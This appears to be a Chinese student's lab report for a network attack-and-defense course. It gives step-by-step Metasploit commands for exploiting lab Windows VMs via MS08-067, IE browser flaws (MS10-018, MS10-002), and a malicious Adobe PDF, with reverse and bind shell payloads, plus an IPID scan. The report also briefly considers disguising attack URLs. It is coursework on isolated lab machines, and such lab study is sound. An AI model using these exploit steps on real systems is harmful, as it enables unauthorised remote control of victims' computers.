2020-2021-2 20181304石昊林《网络对抗技术》 Exp6 MSF应用基础
MSF应用基础
实践目标
- 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。
实践内容
- 一个主动攻击实践,尽量使用最新的类似漏洞;
- 一个针对浏览器的攻击,尽量使用最新的类似漏洞;
- 一个针对客户端的攻击,如Adobe或office,尽量使用最新的类似漏洞;
- 成功实现应用任何一个辅助模块。
实践过程
1. 主动攻击实践
- MS08_067(不唯一)
- 靶机:windows 2000,ip地址为:192.168.0.111
- 攻击机:kali,ip地址为:192.168.0.112
- 在kali中输入msfconsole进入msf控制台:输入以下指令:
search ms08-067查看漏洞位置

use exploit/windows/smb/ms08_067_netapi选择对应位置的漏洞set payload generic/shell_reverse_tcp设置攻击载荷:tcp反向回连set LHOSTS 192.168.0.112设置攻击机IPset RHOSTS 192.168.0.111设置靶机IPexploit进行攻击

2. 针对浏览器的攻击
- MS10_018(不唯一)
- 靶机:windows XP Professional,ip地址为:172.30.0.251
- 攻击机:kali,ip地址为:172.30.1.3
- 在kali中输入msfconsole进入msf控制台:输入以下指令:
search ms10_018查看漏洞位置

use exploit/windows/browser/ms10_018_ie_behaviors选择第一个漏洞set payload windows/meterpreter/bind_tcp设置攻击载荷

show options显示连接需要设置的参数set RHOST 172.30.0.251设置靶机IP

set target 0exploit进行攻击

- 在靶机浏览器中输入上述local IP,浏览器自动关闭,攻击成功。此时kali虚拟机中显示生成了会话1,如下图:

- 输入
sessions -i -1进入会话,可以控制靶机。

- MS10_002(唯一)
- 靶机:windows XP Professional,ip地址为:172.30.0.251
- 攻击机:kali,ip地址为:172.30.1.3
- 在kali中输入msfconsole进入msf控制台:输入以下指令:
search ms10_002查看漏洞位置

use exploit/windows/browser/ms10_002_aurora选择第一个漏洞show payload查看有效的攻击载荷(太多了,只截一部分)

set payload windows/meterpreter/bind_tcp设置攻击载荷

show options显示连接需要设置的参数,然后设置参数。

exploit进行攻击

- 在靶机浏览器中输入上述local IP的地址,浏览器无响应,攻击成功。

- 此时kali虚拟机中显示生成了会话1,如下图:

- 输入
sessions -i -1进入会话,可以控制靶机。

3. 针对客户端的攻击
- Adobe(唯一)
- 这里不同点在于靶机通过访问loacl ip的地址,下载pdf文件并打开,从而使用攻击机攻击成功。
- 靶机:windows 7,ip地址为:192.168.43.18
- 攻击机:kali,ip地址为:192.168.43.28
- 在kali中输入msfconsole进入msf控制台:输入以下指令:
search adobe查看漏洞位置,选择use exploit/windows/browser/adobe_cooltype_sing(注意这里不是生成一个pdf文件,而是一个下载地址,在靶机中浏览器中打开)。

set payload windows/meterpreter/reverse_tcp设置攻击载荷。

show options

set LHOST 192.168.43.28set LPORT 1304exploit

- 在靶机浏览器中输入上述local IP的地址,浏览器打开后下载文件,使用Adobe打开,攻击机显示攻击成功。

4. 成功实现应用任何一个辅助模块
- ipidseq
- 它的功能是扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为
Incremental!的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。 - TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。
- 靶机:windows 7,ip地址为:192.168.43.18
- 攻击机:kali,ip地址为:192.168.43.28
- 在kali中输入msfconsole进入msf控制台:输入以下指令:
use auxiliary/scanner/ip/ipidseq

set RHOSTS 192.168.1.0/24对指定网段的主机进行扫描

set TIMEOUT 5设置5秒扫不到就断开

exploit攻击

实践问题回答
- 用自己的话解释什么是exploit,payload,encode。
exploit就是漏洞利用,即利用系统或程序的漏洞进行攻击的过程,不过这个过程需要一些简单的设置。payload就是攻击时需要设置的代码,也就是攻击者手中的武器罢了。encode就是编码,可以消除一些坏字符,也可能被用作帮助其被杀软发现。
- 离实战还缺些什么技术或步骤?
- 首先我觉得局限性比较大,就像一些漏洞只对应一些指定的版本。
- 如何做到“欺骗”,即攻击浏览器,如何才能让生成的网址看起来的正确的,我觉得这里需要多思考一下。
实践遇到的问题
- MS11_050
- 我在使用这个漏洞攻击浏览器时,多次尝试但是不能攻击成功,报错如下图所示:

- 主要是这句话:
Unknown User-Agent Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)我研究了一下,这条信息表明我使用的是浏览器是IE6,操作系统是XP,和火狐没啥关系。。。这句话的意思应该是叫我用IE浏览器浏览该网页,但我确实是用IE去访问的。我想可能是版本的问题,但是我在网上找不到之前的版本去尝试,这个漏洞到这就结束了。
实践体会
- 这次实验要下载的东西很多,在着期间我也遇到了各种各样的问题,虚拟机也崩了好多次,我花费了大量时间和精力才能做出一部分。但是通过这次实验,我对MSF的使用方法更加了解了,这是收获最大的地方。

浙公网安备 33010602011771号